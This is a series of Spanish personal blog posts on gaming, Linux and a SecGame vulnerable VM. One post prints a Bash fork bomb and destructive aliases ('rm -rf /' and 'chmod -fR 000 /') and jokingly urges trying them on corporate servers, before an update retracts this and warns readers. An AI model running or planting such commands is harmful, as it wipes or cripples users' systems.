Ezequiel Gutesman: Primer post

Hola,
bueno hace muchos meses que tengo este blog y esta vez me decidi a empezar a escribir.
Basicamente quiero que este sea un lugar donde volcar ideas, opiniones y demases. Son todos bienvenidos a discutir y eso..

chau!

Pablo Alejandro Costesich: WolfKing

Ph33r M3 1337 K3YB04RD!

Es impresionante, la verdad que anda excelente y te deja menos adoloridas las manos si es que tenés síndrome del túnel carpiano como yo. Toda persona que juegue fps' en una portátil o escritorio reducido que se precie debe tener un teclado para juegos, como este.



Pablo Alejandro Costesich: rolgps

Por un tiempo fue un excelente proyecto. Me refiero a esta "enciclopedia de coordenadas" que hicimos entre Arlick, Sunos y yo. El proyecto en su etapa inicial alcanzó todas las expectativas y las superó conforme el paso del tiempo.

El problema viene con las licencias. No tengo tiempo para discutir si puedo o no usar el material del juego, quiero concentrarme en los estudios y vacaciones, no en un juego que debería ser un espacio de ocio. Alguno de estos días voy a mandar un mensaje a los que poseen la licencia de propiedad intelectual para pedirles permiso de uso en la aplicación.

Por otra parte, prefiero dejar el proyecto en segundo plano por la tecnología que estoy usando. Los threads hacen un trabajo HERMOSO en el tema de búsquedas, pero tener que esperar 3 segundos para parsear un archivo completo de XML me enerva. Tiene que haber una forma más rápida sin usar bases de datos y manteniendo la tecnología de XML para leer un archivo de más de 8000 líneas (de los cuales hay arriba de 1000 objetos).

El nuevo proyecto planeaba implementar un mapa, poner las opciones por ficheros XML, tener un motor totalmente independiente de la aplicación (la idea era tener dos, de los cuales elegir) y ser totalmente actualizable desde la base. ¡Incluso, la idea era que pueda admitir "mods" para distintos juegos! Más adelante podíamos incluir áreas, trazados de mapas por vectores y miles de cosas por la modularidad del proyecto.

La cuestión radica en que esto requiere no sólo conocimiento, sino que tiempo y esfuerzo para obtenerlo.

Vamos a ver qué puedo hacer en las próximas semanas.

Pablo Alejandro Costesich: Seguridad Informática

Seguridad Informática es el término que recibe a todo lo que tenés que asegurarte de estar haciendo bien antes de sentarte adelante del monitor y tocar cualquier cosa. Esto puede aplicarse no sólo a computadoras, sino que también a todo equipo existente en la actualidad que maneje datos o información, lo cual incluye teléfonos móviles, pda's, el router inalámbrico y hasta la wii (sí, ya se puede ejecutar código no autenticado en la Wii. Wiiiiiii xD).

Consejos de seguridad:

  • No confíen en nadie. Ni siquiera los adjuntos, imágenes o cosas que los más conocidos tuyos te puedan pasar. Claro, eso puede suponer que las imágenes que te mandan no pueden tener nada, pero hay técnicas de ofuscación que permiten sin más incluir ejecutables en dichos archivos. Siempre preguntar sobre lo que te pasan.
  • No ejecutar programas de procedencia desconocida. Díganle adiós a la mula, el bittorrent, etc. ¿Para qué los necesitan si usan linux? Ah... No usan linux? Hmm... Estás al horno.
  • Usen un sistema operativo que sea OFICIAL, REAL y no pirata. Piratear es malo, demasiado. Tanto que para evitarlo puse un Debian y un Ubuntu, sin contar de haber probado distros como RedHat, Fedora, OpenSuSE y Slackware (la única afuera de los Debian-Based que me gusta). La seguridad en esos sistemas está pensada desde la base, con un sistema de permisos y directorios MUY ESTRICTO.
  • Sin embargo, eso no es suficiente... Tienen que saber qué es lo que hace cada cosa que ejecutan. En la informática no existe tal cosa como la "solución mágica" (Salvo que uses Debian), por lo que es mejor gastar dos horas leyendo el manual que cinco días reinstalando el equipo y buscando le último backup.
  • Siempre USEN CIFRADO. Es como el "profiláctico informático" (el firewall es como el cinturón de castidad).
Es por eso que les voy a demostrar que es posible "hackear" un equipo de forma fácil y rápida si no se cuidan, y lo vulnerable que puede ser un sistema operativo tan avanzado como el GNU/(linux/hurd/opensolaris).

Les presento a Sauron. No, no el de la película, sino que el otro (que tampoco tiene cuerpo, BTW). Saurie es no más que una distro que está preparada para correr con el Santísimo Qemu (me salvó muchas veces), por lo que te recomiendo tener mucha ram.

SG6 Labs publica su primer entorno para SecGame. SecGame #1 Sauron, representa un sistema GNU/Linux en el que se ejecutan una serie de servicios web vulnerables. El objetivo del atacante es escalar privilegios desde la web hasta el sistema local, para una vez allí, aprovechar otras vulnerabilidades existentes y llegar a ser administrador (root).

El desarrollo de la intrusión, aunque tiene niveles lógicos, concretamente unos aproximadamente 7 niveles, aunque por error en algunos lugares aparezcan 10, no tiene una división clara entre ellos. Es decir, no hay un nivel 1, paso a nivel 2, paso a nivel 3, sino que la división se establece exactamente igual que en un entorno real, por la propia elevación de privilegios o revelación de algún tipo de información que nos permita seguir avanzando. Así mismo, se plantean 2 niveles de dificultad, según la máquina virtual descargada: normal o alta.

Lo pueden bajar de acá.

Pablo Alejandro Costesich: :(){:|:&;};:~

Pongan el título en una consola de Bash y me van a odiar para siempre.

:(){ :|:& };:~

Lindo desastre para poner en un alias:

alias doomsday="rm -rf / && :(){ :|:& };:~" y el mundo se acaba.

"rm -rf /" borra TODO lo de la máquina, es decir, borra todo el sistema de ficheros. Si lo concatenás (&&) con el loop anterior, el usuario se ve forzado a reiniciar y darse cuenta de su mala fortuna.


También puede usarse:

alias iknowyouandfrankwereplanningtodisconnectme="(chmod -fR 000 / &)"


Que cambia los permisos de ejecución haciendo un gran desastre sin necesariamente borrar nada. Para el que no entienda el por qué del alias, es una cita de Hal 9000.


Happy Scripting, espero que puedan acceder pronto a algún servidor unix corporativo bastante importante para probarlo!

Actualización:

Ahora enserio... NO LO INTENTEN. Es real, rompe el equipo. Consejos para los lectores, NUNCA CONFÍEN EN LOS SCRIPTS QUE LES PASAN. No ejecuten nada que no saben qué es lo que hace, porque efectivamente puede dejar el equipo inútil a nivel de soft.

Esto va a título informativo para que aprendan un poco de lo que es seguridad (interesante para hacer una entrada nueva).

Pablo Alejandro Costesich: Defcon II

En respuesta a BajoYo, colega de foros de hace años, voy a detallar un poco más sobre el DEFCON. Es un juego en línea con el que se pueden jugar guerras nucleares de hasta 6 personas y otros tantos expectadores. Está basado en Juegos de Guerra, esa película que ahora es parte del cine de culto donde la guerra era una posibilidad a la vuelta de la esquina (y más una nuclear).

El juego está desarrollado por una compañía británica que dice ser una de las últimas de "programadores caseros" (es lo más aproximado en español), son doce personas que escribieron desde el código hasta la música. Lo interesante es que, como está pasando con muchas aplicaciones nuevas, es multiplataforma: soporta windows, linux y macOS. No se necesita wine para ejecutarlo, sólo la aceleración privativa de la placa de video.

Para el que no sabe, estoy en Debian en estos momentos (tengo varios GNU/Linux instalados), y también lo probé en Ubuntu (que no es más que un Debian Syd reversionado). ¡Funciona perfecto!

Otra cosa más: el juego es "demo" indefinido, es decir, es gratis para jugar partidas dos contra dos, y por su puesto que tiene menos cosas que la versión full. Sin embargo, el costo de envío a la argentina con caja, póster, cd y manual sale no más de treinta dólares (que para un juego europeo es bastante barato si lo ponemos en la balanza). Tal vez en un futuro lo termine comprando, ahora necesito ahorrar para otras cosas más importantes (la universidad!).


EDITO: El link es Everybody-dies.com, bastante descriptivo.

Pablo Alejandro Costesich: DEFCON

Todos mueren :D


TODOS mueren. Acá no se salva nadie ni nada.

Defcon empieza donde Balance of Power termina, es decir, fin de la guerra fría y comienzo de la tercer guerra mundial en un mundo hipotético. En el juego, no hay países sino que uniones de naciones, donde Europa, América del Norte, Asia del Norte, Asia del Sur y América del Sur se destrozan a tiros.


Esto NO es una review del juego, hay treinta y dos millones por internet... Sólo es un comentario para que vean como queda todo.

Es un juego macabro, frío y brutal. Rápido, y apocalíptico porque todo ocurre casi en tiempo real sin la posibilidad de construir nada. Me gusta la "simplicidad" de los gráficos comparada a la crudeza. La ambientación es tétrica y tranquila, pero definitivamente horrenda al pensar que afuera "mueren" millones.

De todos los juegos que alguna vez probé, el DEFCON es el más brutal, por lejos. Es la prueba definitiva de que no se necesita sangre para causar un shock sensacional.

Pablo Alejandro Costesich: Debian + nvidia

Instalé los drivers propietarios de nvidia desde los repositorios de debian etch... Los necesito para jugar (disfrutar el DEFCON o el Regnum), pero lo malo es que no son libres :cuac:

Bueh, parece que andan estables para la vida "común", pero todavía tengo problemas con los juegos. A ver cómo evoluciona esto.


Por otra parte, me parece que voy a necesitar un cargador solar para el celular y la palm, ahora que voy a estar alejado de la electricidad y quiero que sea portátil.

.